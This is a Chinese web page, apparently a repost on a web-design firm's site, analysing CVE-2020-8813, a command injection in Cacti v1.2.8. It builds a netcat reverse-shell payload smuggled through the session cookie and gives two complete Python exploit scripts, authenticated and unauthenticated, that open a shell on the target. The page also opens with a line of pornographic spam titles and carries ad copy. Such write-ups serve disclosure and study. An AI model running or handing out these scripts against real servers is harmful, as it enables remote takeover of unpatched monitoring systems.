最近2018中文字幕在日韩欧美国产成人片_国产日韩精品一区二区在线_在线观看成年美女黄网色视频_国产精品一区三区五区_国产精彩刺激乱对白_看黄色黄大色黄片免费_人人超碰自拍cao_国产高清av在线_亚洲精品电影av_日韩美女尤物视频网站

如何進(jìn)行Cacti v1.2.8 中經(jīng)過身份驗(yàn)證的RCE漏洞分析，很多新手對(duì)此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

網(wǎng)站建設(shè)哪家好，找創(chuàng)新互聯(lián)！專注于網(wǎng)頁(yè)設(shè)計(jì)、網(wǎng)站建設(shè)、微信開發(fā)、小程序開發(fā)、集團(tuán)企業(yè)網(wǎng)站建設(shè)等服務(wù)項(xiàng)目。為回饋新老客戶創(chuàng)新互聯(lián)還提供了定海免費(fèi)建站歡迎大家使用！

關(guān)于Cacti

   Cacti是一套基于PHP,MySQL,SNMP及RRDTool開發(fā)的網(wǎng)絡(luò)流量監(jiān)測(cè)圖形分析工具。Cacti通過 snmpget來獲取數(shù)據(jù)，使用 RRDtool繪畫圖形，而且你完全可以不需要了解RRDtool復(fù)雜的參數(shù)。它提供了非常強(qiáng)大的數(shù)據(jù)和用戶管理功能，可以指定每一個(gè)用戶能查看樹狀結(jié)構(gòu)、host以及任何一張圖，還可以與LDAP結(jié)合進(jìn)行用戶驗(yàn)證，同時(shí)也能自己增加模板，功能非常強(qiáng)大完善。界面友好。軟件 Cacti 的發(fā)展是基于讓 RRDTool 使用者更方便使用該軟件，除了基本的 Snmp 流量跟系統(tǒng)資訊監(jiān)控外，Cacti 也可外掛 Scripts 及加上 Templates 來作出各式各樣的監(jiān)控圖。

cacti是用php語言實(shí)現(xiàn)的一個(gè)軟件，它的主要功能是用snmp服務(wù)獲取數(shù)據(jù)，然后用rrdtool儲(chǔ)存和更新數(shù)據(jù)，當(dāng)用戶需要查看數(shù)據(jù)的時(shí)候用rrdtool生成圖表呈現(xiàn)給用戶。因此，snmp和rrdtool是cacti的關(guān)鍵。Snmp關(guān)系著數(shù)據(jù)的收集，rrdtool關(guān)系著數(shù)據(jù)存儲(chǔ)和圖表的生成。

漏洞利用分析

我在分析Cacti主要代碼中的多個(gè)功能函數(shù)時(shí)，發(fā)現(xiàn)了這個(gè)漏洞。我需要結(jié)合多個(gè)漏洞利用因素才能實(shí)現(xiàn)代碼執(zhí)行，當(dāng)攻擊者嘗試向“Cacti”這個(gè)Cookie變量中注入惡意代碼時(shí)，便會(huì)觸發(fā)這個(gè)漏洞，而這個(gè)變量在與一些字符串合并之后將會(huì)被傳遞給shell_exec函數(shù)。但是當(dāng)我嘗試修改這個(gè)cookie值時(shí)遇到了身份驗(yàn)證的問題，而這個(gè)問題使我無法訪問到目標(biāo)頁(yè)面，但是我發(fā)現(xiàn)這個(gè)包含漏洞的頁(yè)面是能夠以“Guest”身份訪問的，這樣就不需要進(jìn)行身份驗(yàn)證了，所以我修改了漏洞利用代碼，并使用“Guest”身份來訪問頁(yè)面“graph_realtime.php”，然后發(fā)送惡意請(qǐng)求來在目標(biāo)主機(jī)上實(shí)現(xiàn)代碼執(zhí)行。

首先，我們需要向“user_admin.php”頁(yè)面發(fā)送一個(gè)請(qǐng)求來啟用“realtime_graph”的訪客權(quán)限，然后再向“graph_realtime.php”頁(yè)面發(fā)送惡意請(qǐng)求。

接下來，我使用了這個(gè)常用的RCE掃描腳本【RECScanner】來在Cacti中搜索RCE漏洞。

運(yùn)行腳本后，我在“graph_realtime.php”文件中發(fā)現(xiàn)了一個(gè)非常有意思的東西：

graph_realtime.php

/* call poller */$graph_rrd = read_config_option('realtime_cache_path') . '/user_' . session_id() . '_lgi_' . get_request_var('local_graph_id') . '.png';$command   = read_config_option('path_php_binary');$args      = sprintf('poller_realtime.php --graph=%s --interval=%d --poller_id=' . session_id(), get_request_var('local_graph_id'), $graph_data_array['ds_step']);shell_exec("$command $args");/* construct the image name  */$graph_data_array['export_realtime'] = $graph_rrd;$graph_data_array['output_flag']     = RRDTOOL_OUTPUT_GRAPH_DATA;$null_param = array();

我們可以看到上述代碼中的第4和第5行，我們收到了一些參數(shù)，還有一個(gè)名叫“get_request_var”的函數(shù)，該函數(shù)的作用如下：

html_utility.php

function get_request_var($name, $default = '') {    global $_CACTI_REQUEST;    $log_validation = read_config_option('log_validation');    if (isset($_CACTI_REQUEST[$name])) {        return $_CACTI_REQUEST[$name];    } elseif (isset_request_var($name)) {        if ($log_validation == 'on') {            html_log_input_error($name);        }        set_request_var($name, $_REQUEST[$name]);        return $_REQUEST[$name];    } else {        return $default;    }}

我們可以看到，這個(gè)函數(shù)可以處理輸入數(shù)據(jù)并通過函數(shù)“set_request_var”來設(shè)置參數(shù)值，而這個(gè)函數(shù)的相關(guān)代碼如下：

html_utility.php

function set_request_var($variable, $value) {    global $_CACTI_REQUEST;    $_CACTI_REQUEST[$variable] = $value;    $_REQUEST[$variable]       = $value;    $_POST[$variable]          = $value;    $_GET[$variable]           = $value;}

接下來，回到我們的“graph_realtime.php”頁(yè)面，我們可以控制下列輸入：

local_graph_idThe value of $graph_data_array[‘ds_step’]

但是，我們注意到“graph_realtime.php”文件中的第4行，它使用了sprintf()函數(shù)來處理輸入，而第一個(gè)值“graph”的內(nèi)容為“l(fā)ocal_graph_id”，而這個(gè)值是我們可以控制的！又但是，一個(gè)名叫“get_filter_request_var”的函數(shù)會(huì)對(duì)這個(gè)值進(jìn)行過濾，我們可以看到，它在“graph_realtime.php”中已經(jīng)被過濾了：

html_utility.php

function get_filter_request_var($name, $filter = FILTER_VALIDATE_INT, $options = array()) {    if (isset_request_var($name)) {        if (isempty_request_var($name)) {            set_request_var($name, get_nfilter_request_var($name));            return get_request_var($name);        } elseif (get_nfilter_request_var($name) == 'undefined') {            if (isset($options['default'])) {                set_request_var($name, $options['default']);                return $options['default'];            } else {                set_request_var($name, '');                return '';            }        } else {            if (get_nfilter_request_var($name) == '0') {                $value = '0';            } elseif (get_nfilter_request_var($name) == 'undefined') {                if (isset($options['default'])) {                    $value = $options['default'];                } else {                    $value = '';                }            } elseif (isempty_request_var($name)) {                $value = '';            } elseif ($filter == FILTER_VALIDATE_IS_REGEX) {                if (is_base64_encoded($_REQUEST[$name])) {                    $_REQUEST[$name] = utf8_decode(base64_decode($_REQUEST[$name]));                }                $valid = validate_is_regex($_REQUEST[$name]);                if ($valid === true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                    $custom_error = $valid;                }            } elseif ($filter == FILTER_VALIDATE_IS_NUMERIC_ARRAY) {                $valid = true;                if (is_array($_REQUEST[$name])) {                    foreach($_REQUEST[$name] AS $number) {                        if (!is_numeric($number)) {                            $valid = false;                            break;                        }                    }                } else {                    $valid = false;                }                if ($valid == true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                }            } elseif ($filter == FILTER_VALIDATE_IS_NUMERIC_LIST) {                $valid = true;                $values = preg_split('/,/', $_REQUEST[$name], NULL, PREG_SPLIT_NO_EMPTY);                foreach($values AS $number) {                    if (!is_numeric($number)) {                        $valid = false;                        break;                    }                }                if ($valid == true) {                    $value = $_REQUEST[$name];                } else {                    $value = false;                }            } elseif (!cacti_sizeof($options)) {                $value = filter_var($_REQUEST[$name], $filter);            } else {                $value = filter_var($_REQUEST[$name], $filter, $options);            }        }        if ($value === false) {            if ($filter == FILTER_VALIDATE_IS_REGEX) {                $_SESSION['custom_error'] = __('The search term "%s" is not valid. Error is %s', html_escape(get_nfilter_request_var($name)), html_escape($custom_error));                set_request_var($name, '');                raise_message('custom_error');            } else {                die_html_input_error($name, get_nfilter_request_var($name));            }        } else {            set_request_var($name, $value);            return $value;        }    } else {        if (isset($options['default'])) {            set_request_var($name, $options['default']);            return $options['default'];        } else {            return;        }    }}

這個(gè)函數(shù)將會(huì)對(duì)輸入數(shù)據(jù)進(jìn)行過濾，然后返回一個(gè)“干凈的”變量并傳遞給下一個(gè)函數(shù)。

對(duì)于第二個(gè)變量“$graph_data_array[‘ds_step’]”，它已經(jīng)通過sprintf()進(jìn)行處理了（%d），這也就意味著它會(huì)變成一個(gè)十進(jìn)制值，所以我們無法用它來注入我們的惡意命令。

接下來，我們?cè)倏纯聪旅孢@段代碼：

graph_realtime.php

/* call poller */$graph_rrd = read_config_option('realtime_cache_path') . '/user_' . session_id() . '_lgi_' . get_request_var('local_graph_id') . '.png';$command   = read_config_option('path_php_binary');$args      = sprintf('poller_realtime.php --graph=%s --interval=%d --poller_id=' . session_id(), get_request_var('local_graph_id'), $graph_data_array['ds_step']);shell_exec("$command $args");/* construct the image name  */$graph_data_array['export_realtime'] = $graph_rrd;$graph_data_array['output_flag']     = RRDTOOL_OUTPUT_GRAPH_DATA;$null_param = array();

我們看到了另一個(gè)傳遞給shell_exec函數(shù)的變量，而這個(gè)變量的值就是session_id()函數(shù)返回的值，這個(gè)函數(shù)可以返回當(dāng)前用戶會(huì)話的值，也就是說，我們可以用它來注入我們的命令。

等一下，如果我們修改了會(huì)話，那我們就無法訪問目標(biāo)頁(yè)面了，因?yàn)檫@個(gè)頁(yè)面要求用戶在經(jīng)過了身份驗(yàn)證之后才能訪問。研究之后我又發(fā)現(xiàn)，如果我們啟用了一個(gè)名叫“Realtime Graphs”的特殊權(quán)限之后，我們就能夠以訪客身份訪問這個(gè)頁(yè)面了：

接下來，我們嘗試在不開啟“Guest Realtime Graphs”權(quán)限的情況下訪問該頁(yè)面：

正如我們所見，由于權(quán)限問題，我們現(xiàn)在無法訪問這個(gè)頁(yè)面，現(xiàn)在我們重新開啟該權(quán)限，然后訪問該頁(yè)面：

很好，接下來我們發(fā)送“graph_realtime.php”頁(yè)面請(qǐng)求，然后在代碼中添加一條“echo”語句來輸出傳遞給shell_exec函數(shù)的值：

如圖所示，我們將會(huì)話打印了出來，接下來我們嘗試向會(huì)話中注入自定義字符串：

非常好，我們成功實(shí)現(xiàn)了注入。

Payload開發(fā)

成功控制了會(huì)話值之后，我們需要用它來在目標(biāo)系統(tǒng)中實(shí)現(xiàn)代碼執(zhí)行，但由于它本質(zhì)上還是一個(gè)會(huì)話值，因此我們無法使用一些特殊字符，所以我們需要開發(fā)一個(gè)“對(duì)會(huì)話友好的”Payload。

比如說，如果對(duì)字符串“Hi Payload”進(jìn)行編碼，然后傳遞給應(yīng)用程序，我們將會(huì)看到：

我們可以看到，應(yīng)用程序設(shè)置了一個(gè)Cookie給我們，而不是我們所注入的那個(gè)，為了解決這個(gè)問題，我們需要使用一個(gè)自定義的Payload。

為了避免使用空格字符，我打算使用“${IFS}”這個(gè)Bash變量來代表一個(gè)空格。

當(dāng)然了，我們還需要使用“;”來轉(zhuǎn)義命令：

;payload

如果我們想使用netcat來獲取一個(gè)Shell，我們還需要?jiǎng)?chuàng)建下列Payload：

;nc${IFS}-e${IFS}/bin/bash${IFS}ip${IFS}port

我們先對(duì)Payload進(jìn)行編碼：

然后將其發(fā)送給應(yīng)用程序：

很好，我們的Payload執(zhí)行成功了，并拿到了一個(gè)Shell。

漏洞利用代碼

為了實(shí)現(xiàn)整個(gè)漏洞利用的自動(dòng)化過程，我編寫了一個(gè)Python腳本來利用該漏洞：

#!/usr/bin/python3# Exploit Title: Cacti v1.2.8 Remote Code Execution# Date: 03/02/2020# Exploit Author: Askar (@mohammadaskar2)# CVE: CVE-2020-8813# Vendor Homepage: https://cacti.net/# Version: v1.2.8# Tested on: CentOS 7.3 / PHP 7.1.33import requestsimport sysimport warningsfrom bs4 import BeautifulSoupfrom urllib.parse import quotewarnings.filterwarnings("ignore", category=UserWarning, module='bs4')if len(sys.argv) != 6:    print("[~] Usage : ./Cacti-exploit.py url username password ip port")    exit()url = sys.argv[1]username = sys.argv[2]password = sys.argv[3]ip = sys.argv[4]port = sys.argv[5]def login(token):    login_info = {    "login_username": username,    "login_password": password,    "action": "login",    "__csrf_magic": token    }    login_request = request.post(url+"/index.php", login_info)    login_text = login_request.text    if "Invalid User Name/Password Please Retype" in login_text:        return False    else:        return Truedef enable_guest(token):    request_info = {    "id": "3",    "section25": "on",    "section7": "on",    "tab": "realms",    "save_component_realm_perms": 1,    "action": "save",    "__csrf_magic": token    }    enable_request = request.post(url+"/user_admin.php?header=false", request_info)    if enable_request:        return True    else:        return Falsedef send_exploit():    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)    cookies = {'Cacti': quote(payload)}    requests.get(url+"/graph_realtime.php?action=init", cookies=cookies)request = requests.session()print("[+]Retrieving login CSRF token")page = request.get(url+"/index.php")html_content = page.textsoup = BeautifulSoup(html_content, "html5lib")token = soup.findAll('input')[0].get("value")if token:    print("[+]Token Found : %s" % token)    print("[+]Sending creds ..")    login_status = login(token)    if login_status:        print("[+]Successfully LoggedIn")        print("[+]Retrieving CSRF token ..")        page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms")        html_content = page.text        soup = BeautifulSoup(html_content, "html5lib")        token = soup.findAll('input')[1].get("value")        if token:            print("[+]Making some noise ..")            guest_realtime = enable_guest(token)            if guest_realtime:                print("[+]Sending malicous request, check your nc ;)")                send_exploit()            else:                print("[-]Error while activating the malicous account")        else:            print("[-] Unable to retrieve CSRF token from admin page!")            exit()    else:        print("[-]Cannot Login!")else:    print("[-] Unable to retrieve CSRF token!")exit()

運(yùn)行了漏洞利用代碼之后，我們將會(huì)看到：

再一次成功拿到了Shell！

未經(jīng)身份認(rèn)證的漏洞利用

如果Cacti啟用了“Guest Realtime Graphs”權(quán)限，那么我們就可以在未經(jīng)身份驗(yàn)證的情況下利用該漏洞了。下面給出的是這種場(chǎng)景下的漏洞利用代碼：

#!/usr/bin/python3# Exploit Title: Cacti v1.2.8 Unauthenticated Remote Code Execution# Date: 03/02/2020# Exploit Author: Askar (@mohammadaskar2)# CVE: CVE-2020-8813# Vendor Homepage: https://cacti.net/# Version: v1.2.8# Tested on: CentOS 7.3 / PHP 7.1.33import requestsimport sysimport warningsfrom bs4 import BeautifulSoupfrom urllib.parse import quotewarnings.filterwarnings("ignore", category=UserWarning, module='bs4')if len(sys.argv) != 4:    print("[~] Usage : ./Cacti-exploit.py url ip port")    exit()url = sys.argv[1]ip = sys.argv[2]port = sys.argv[3]def send_exploit(url):    payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)    cookies = {'Cacti': quote(payload)}    path = url+"/graph_realtime.php?action=init"    req = requests.get(path)    if req.status_code == 200 and "poller_realtime.php" in req.text:        print("[+] File Found and Guest is enabled!")        print("[+] Sending malicous request, check your nc ;)")        requests.get(path, cookies=cookies)    else:        print("[+] Error while requesting the file!")send_exploit(url)

我們可以看到，在這種場(chǎng)景下同樣能夠成功利用該漏洞。

漏洞披露

在發(fā)現(xiàn)該問題之后，我們便將完整的PoC上報(bào)給了Cacti的團(tuán)隊(duì)，他們也在第一時(shí)間修復(fù)了該漏洞并發(fā)布了漏洞補(bǔ)丁，從Cacti v1.2.10開始將不再受此漏洞的影響。

    

看完上述內(nèi)容是否對(duì)您有幫助呢？如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章，請(qǐng)關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道，感謝您對(duì)創(chuàng)新互聯(lián)的支持。

網(wǎng)頁(yè)題目：如何進(jìn)行Cactiv1.2.8中經(jīng)過身份驗(yàn)證的RCE漏洞分析
標(biāo)題來源：http://fisionsoft.com.cn/article/gighoe.html